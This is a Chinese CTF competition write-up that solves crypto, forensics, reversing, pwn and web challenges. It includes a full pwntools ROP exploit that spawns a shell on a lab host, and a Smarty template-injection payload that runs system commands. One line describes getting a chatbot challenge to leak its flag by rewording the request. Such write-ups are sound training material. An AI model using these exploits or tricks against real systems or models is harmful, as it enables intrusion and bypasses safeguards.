2023年四川网信人才技能大赛 决赛 实操赛 Writeup


题目附件,文章末尾微信公众号点点关注亲,谢谢亲~

题目附件链接:https://pan.baidu.com/s/1kC9kiyUCfjTxqkXPpUFoXw 
提取码:dh2w 

Crypto

比base64少的base

image.png

affine

wohz{k533q73q-t76t-9292-351w-h880t22q2q59}

a=3 b=7

image.png

简单的RSA

p = r**5 + r**4 - r**3 + r**2 - r + 2023
q = r**5 - r**4 + r**3 - r**2 + r + 2023

所以n近似等于

r**10 - r**8 + 2*r**7 - 3*r**6 + 4050*r**5 - 3*r**4 + 2*r**3 - r**2 + 4092529==n

z3求解出r,进而得到pq ,然后进行常规的解密

n = 25066797992811602609904442429968244207814135173233823574561146780193277243588729282392464721760638040595480284865294238118778099149754637586361909432730412493061503054820202744474632665791457

r = Real('r')
s = Solver()
s.add(r**10 - r**8 + 2*r**7 - 3*r**6 + 4050*r**5 - 3*r**4 + 2*r**3 - r**2 + 4092529==n)
print(s.check())
print(s.model())
[r = -10962507061290870331]
from Crypto.Util.number import *
# from secret import flag
from sympy import nextprime

flag=b''

r = 10962507061290870331
p = r**5 + r**4 - r**3 + r**2 - r + 2023
q = r**5 - r**4 + r**3 - r**2 + r + 2023
p =nextprime(p)
q =nextprime(q)
n = p*q
d = inverse_mod(65537,(p-1)*(q-1))

c = 18808483076270941157829928736000549389727451019027515249724024369421942132354537978233676261769285858813983730966871222263698559152437016666829640339912308636169767041243411900882395764607422
def enc(c, n):
    return ZZ(pow(c, d, n))
long_to_bytes(enc(c, n))
b'flag{5afe5cbb-4b4c-9cb6-f8b6-032cabf4b7e7}'

Misc

不要动我的flag

追踪TCP流,第0个流发现flag的sha256image.png
3个流发现残缺的flag
image.png

import random
import hashlib

hexStr = "0123456789abcdef"
while True:
	partFlag = ''.join([random.choice(hexStr) for _ in range(4)])
	flag = 'flag{{22af230f-bbed-{}-95fa-b6b1ca6dc32e}}'.format(partFlag)
	sha256Flag = hashlib.sha256(flag.encode()).hexdigest()
	if sha256Flag[:20] == 'c7e6ea42b7301e6330ba':
		print(flag, sha256Flag)
		break
PS C:\Users\Administrator\Downloads> python .\misc.py
flag{22af230f-bbed-48b9-95fa-b6b1ca6dc32e} c7e6ea42b7301e6330ba3959fe407930191d371885935ad4cd51e95e857a3155

SimpleUSB

原题:HWS第七期夏令营(硬件安全营)预选赛Misc USB

过滤所有的长度为35usb.capdata
image.png

D:\Wireshark\tshark.exe -r .\misc1.pcapng -T fields -Y "frame.len==35" -e usb.capdata > keyboard.txt

image.png
有很多20开头的这些里面也是有键盘数据的,把条件一起加进去,然后脚本处理

# -*- coding: utf-8 -*-
import re

normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

def filterProcess(output):
    content = output.replace('<SPACE>', ' ')
    while True:
        if '<DEL>' in content:
            content = re.sub(r'[^>]<DEL>', '', content)
        else:
            break
    return content

with open('keyboard.txt', 'r') as f:
    output = ""
    lines = f.readlines()
    for line in lines:
        ifShiftKeys, usbData = line[0:2], line[4:6]
        if usbData != "00":
            if ifShiftKeys == "00":
                if usbData in normalKeys:
                    output += normalKeys[usbData]
            elif ifShiftKeys == "02" or ifShiftKeys == "20": # 按下了Shift键
                if usbData in shiftKeys:
                    output += shiftKeys[usbData]
print("[+]Output: {}\n".format(output))
print("[+]Filter Processed: {}".format(filterProcess(output)))
PS C:\Users\Administrator\Downloads> python .\UsbKeyboard.py
[+]Output: Ao(mgHy<DEL>Y$\<CAP>a@q7<CAP>gW2D$dE@6#oO0f<Gm1hAI'/N#4C<DEL><AN;<CAP>ms@p<CAP>frQ149K

最终得到:Ao(mgHY$\A@Q7gW2D$dE@6#oO0f<Gm1hAI'/N#4<AN;MS@PfrQ149K

直接跑一下看看是啥子
image.png

猜猜我是谁

根据题目提示猜测outguess的密码是扑克牌K画像的人名:caesar
image.pngr
然后还有一层凯撒
image.png

不聪明的AI

输入flag回答说中文,直接输出旗帜返回flag

Pwn

getitez

静态分析下,addbook里面的v9是栈上的,v8指向addbook的函数
image.png
addbook函数, 上面v90x18, 下面read可以读0x100个字节,明显一个栈溢出,先用 showbook功能leakcanarylibc地址,然后ROP

__int64 __fastcall sub_14BA(__int64 a1, void *a2)
{
  __int64 result; // rax

  std::operator<<<std::char_traits<char>>(&std::cout, "book name:");
  read(0, a2, 0x100uLL);
  std::operator<<<std::char_traits<char>>(&std::cout, "book price:");
  std::istream::operator>>(&std::cin, a1 + 8);
  result = a1;
  *(_QWORD *)(a1 + 16) = a2;
  return result;
}

exp

from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', log_level = 'info')	#info

path = "./getitez"
#p = process(path)
p = remote('10.10.10.101', 35067)
elf = ELF(path)
libc = elf.libc

def g():
	gdb.attach(p)
	raw_input()

sl = lambda arg : p.sendline(arg)
sla = lambda arg1, arg2 : p.sendlineafter(arg1, arg2)
sd = lambda arg : p.send(arg)
ru = lambda arg : p.recvuntil(arg)
rl = lambda : p.recvline()
sa = lambda arg1, arg2 : p.sendafter(arg1, arg2)
inv = lambda : p.interactive()


def choice(num):
    sla(b'choice', str(num).encode())


def addbook(name):
	choice(1)
	sla(b'name:', name)
	sla(b'price:', b'123')


def showbook():
    choice(2)


pay = b'a' * 0x18
addbook(pay)
showbook()

ru(b'a' * 0x18)
canary = int.from_bytes(p.recv(14), 'little') & 0xffffffffffffff00
log.success('canary = ' + hex(canary))

pay1 = b'a' * 0x38
addbook(pay1)
showbook()

libc_base = u64(ru(b'\x7f')[-6:].ljust(0x8, b'\x00'))
libc.address = libc_base = ((libc_base - libc.sym['__libc_start_main']) >> 12) << 12
log.success('libc_base = ' +  hex(libc_base))


bin_sh = next(libc.search(b"/bin/sh"))
system_addr = libc.sym['system']
pop_rdi = next(libc.search(asm("pop rdi; ret")))

log.success("bin_sh = " + hex(bin_sh))
log.success("system_addr = " + hex(system_addr))

payload = b'a' * 0x18 + p64(canary)
payload += p64(pop_rdi + 1) * 4 + p64(pop_rdi)
payload += p64(bin_sh) + p64(system_addr)

addbook(payload)
choice(4)

inv()

bbstack

傻逼题目,一个能用的Gadget都没有。。。

Reverse

谁的DNA动了

程序主函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v4; // [rsp+Ch] [rbp-14h]
  int i; // [rsp+10h] [rbp-10h]
  int s; // [rsp+14h] [rbp-Ch] BYREF
  unsigned __int64 v7; // [rsp+18h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  init(argc, argv, envp);
  s = 0;
  v4 = read(0, inputs, 0x40uLL);
  if ( inputs[v4 - 1] == 10 )
    inputs[--v4] = 0;
  for ( i = 0; i < (int)v4; ++i )
  {
    memset(&s, 0, sizeof(s));
    encode(inputs[i], (__int64)&s);
    outputs[4 * i + 3] = s;
    outputs[4 * i + 2] = BYTE1(s);
    outputs[4 * i + 1] = BYTE2(s);
    outputs[4 * i] = HIBYTE(s);
  }
  if ( (unsigned __int8)judge(outputs, CODE, v4) )
  {
    puts("well done!you get it");
  }
  else if ( !strncmp("flag{", inputs, 5uLL) )
  {
//最开始看到后面那个太激动, 以为直接爆破4字节的md5就行,不过交上去是错的, 还是得逆   
    puts("hey!tell you the 'flag'?");
    puts("flag{Th14_15_a_xxxx_flAg},the MD5 hash value of xxxx is \"7c76fb919bab9a1abfe854cf80725a09\",just 4 bytes");
  }
  return 0;
}

//子函数1
__int64 __fastcall encode(unsigned int a1, __int64 a2)
{
  __int64 result; // rax
  int i; // [rsp+1Ch] [rbp-4h]

  result = a1;
  for ( i = 0; i <= 3; ++i )                    // box = "AGCT"
  {
    result = (unsigned __int8)box[((char)a1 >> (2 * i)) & 3];
    *(_BYTE *)(i + a2) = result;
  }
  return result;
}

//子函数2
bool __fastcall judge(__int64 a1, __int64 a2, int a3)
{
  int v4; // ebx
  int v5; // ebx
  int v6; // r12d
  int v8; // [rsp+28h] [rbp-18h]
  int i; // [rsp+2Ch] [rbp-14h]

  v8 = 0;
  if ( 4 * a3 > strlen(CODE) )
    return 0;
  for ( i = 0; i < a3; ++i )
  {
    v4 = Int(*(_BYTE *)(i + a1));
    v5 = Int(*(_BYTE *)(i + a2)) + v4;
    v6 = Int('K');
    if ( v5 == v6 - (unsigned int)Int('B') )
      ++v8;
  }
  return 4 * v8 == strlen(CODE);
}

//子函数3
__int64 __fastcall Int(char a1)
{
  __int64 result; // rax

  switch ( a1 )
  {
    case 'A':
      result = 0LL;
      break;
    case 'B':
      result = 4LL;
      break;
    case 'C':
      result = 2LL;
      break;
    case 'D':
      result = 5LL;
      break;
    case 'F':
      result = 6LL;
      break;
    case 'G':
      result = 1LL;
      break;
    case 'K':
      result = 7LL;
      break;
    case 'M':
      result = 8LL;
      break;
    case 'T':
      result = 3LL;
      break;
    default:
      result = 10LL;
      break;
  }
  return result;
}

一个ascii码字符是8位,循环4次,每次取2位,然后按照box数组存储,就是每4个encode后的字符就是原来的一个字符
最后对比的对象

CODE = "CGCGCGATCGTCCGCACAGATACATATGTACCTATTTATTTAGTCGTCTACCCGCCTACGCGCCTACGTACCCGCTCGTCTATTTATCCGTATATTTACTTAGCTATCTACTCGTATACTTACATACGCGTCCGCCTATTTAGTTACACAAC"

先根据CODE还原出encode后的字符串

#include "header.h"
#include "base64.cpp"
#include "func.cpp"
#include "tea.cpp"

__int64 __fastcall Int(char a1)
{
    __int64 result; // rax

    switch ( a1 )
    {
        case 'A':
            result = 0LL;
            break;
        case 'B':
            result = 4LL;
            break;
        case 'C':
            result = 2LL;
            break;
        case 'D':
            result = 5LL;
            break;
        case 'F':
            result = 6LL;
            break;
        case 'G':
            result = 1LL;
            break;
        case 'K':
            result = 7LL;
            break;
        case 'M':
            result = 8LL;
            break;
        case 'T':
            result = 3LL;
            break;
        default:
            result = 10LL;
            break;
    }
    return result;
}

int main()
{
    char ans[] = "CGCGCGATCGTCCGCACAGATACATATGTACCTATTTATTTAGTCGTCTACCCGCCTACGCGCCTACGTACCCGCTCGTCTATTTATCCGTATATTTACTTAGCTATCTACTCGTATACTTACATACGCGTCCGCCTATTTAGTTACACAAC";
    char res[0x100] = {0};
    p(i, 0, strlen(ans)) {
        p(j, 0x20, 0x7f) {
            if (Int(ans[i]) + Int((char)j) == 3){
                res[i] = (char)j;
            }
        }
    }

    p(i, 0, strlen(res)) {
        printf("%c", res[i]);
    }
    //GCGCGCTAGCAGGCGTGTCTATGTATACATGGATAAATAAATCAGCAGATGGGCGGATGCGCGGATGCATGGGCGAGCAGATAAATAGGCATATAAATGAATCGATAGATGAGCATATGAATGTATGCGCAGGCGGATAAATCAATGTGTTG
    return 21;
}

然后就是将4个字符重新组合成原来的1个字符

    res = "GCGCGCTAGCAGGCGTGTCTATGTATACATGGATAAATAAATCAGCAGATGGGCGGATGCGCGGATGCATGGGCGAGCAGATAAATAGGCATATAAATGAATCGATAGATGAGCATATGAATGTATGCGCAGGCGGATAAATCAATGTGTTG"

    box = "AGCT"
    for i in range(0, len(res), 4):
        a1 = (int(box.index(res[i])))
        a2 = (int(box.index(res[i + 1])))
        a3 = (int(box.index(res[i + 2])))
        a4 = (int(box.index(res[i + 3])))

        c = ((a1 << 6) + (a2 << 4) + (a3 << 2) + a4)
        print(chr(c), end='')

#flag{725008a5e6e65da01c04914c476ae087}

Don’t Touch Me

程序给的是一个ELF文件,结果用ida看一篇混乱,发现有很多python的痕迹,估计是python打包的ELF,用工具还原
image.png
还原后
image.png
基本上就是对导入的touch.check的调用,用ida看py解包出来的touch.so文件

__int64 __fastcall check(BYTE *a1)
{
  int i; // [rsp+10h] [rbp-8h]
  int j; // [rsp+14h] [rbp-4h]

  for ( i = 0; i <= 37; ++i )
  {
    a1[i] ^= 0x25u;
    a1[i] *= 2;
  }
  for ( j = 0; j <= 37; ++j )
  {
    if ( a1[j] != ans[j] )
      return 0LL;
  }
  return 1LL;
}
#ans = [0x86, 0x92, 0x88, 0x84, 0xbc, 0xea, 0xb8, 0xf4, 0x28, 0x2c, 0xf4, 0x2c, 0xca, 0xac, 0xb8, 0xf4, 0xc2, 0x2a, 0x96, 0x24, 0xf4, 0xe2, 0x2a, 0xa0, 0x2e, 0x9a, 0xf4, 0xd0, 0x2c, 0xf4, 0xc8, 0x84, 0x88, 0x98, 0x96, 0x8, 0xb0, 0x4a]

把操作还原就行

    enc = [0x86, 0x92, 0x88, 0x84, 0xbc, 0xea, 0xb8, 0xf4, 0x28, 0x2c, 0xf4, 0x2c, 0xca, 0xac, 0xb8, 0xf4, 0xc2, 0x2a,
           0x96, 0x24, 0xf4, 0xe2, 0x2a, 0xa0, 0x2e, 0x9a, 0xf4, 0xd0, 0x2c, 0xf4, 0xc8, 0x84, 0x88, 0x98, 0x96, 0x8,
           0xb0, 0x4a]

    for i in enc:
        c = chr((i // 2) ^ 0x25)
        print(c, end='')

#flag{Py_13_3@sy_D0n7_T0u2h_M3_Again!}

Web

little_game

查看源码发现一个success,给了一串字符,以及一个数组下标,直接就是遍历这串字符的下标得到的就是flag

arr = '1234567890qwertyuiopasdfghjklzxcvbnm{}-'
index = [23,28,20,24,36,1,3,7,6,3,38,2,8,9,5,7,21,38,9,3,6,18,22,38,26,16,6,18,15,37]
print(''.join([arr[i] for i in index]))
# flag{24874-39068s-047od-ju7oy}

justppb

试过爆破,但是习惯用的是自己的字典,没想到这里要用Burp自带的字典和密码爆破。。。。。
image.png

ezbbs

详情见:https://mochu.blog.csdn.net/article/details/134985861

smart

Smarty的模板注入:https://xz.aliyun.com/t/11108#toc-6
image.png
就是换了个名字,把template_object改成template即可

data=string:{$smarty.template->smarty->enableSecurity()->display('string:{system("ls -lha /")}')}

image.png
绕过直接?匹配或者通配符*
image.png

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值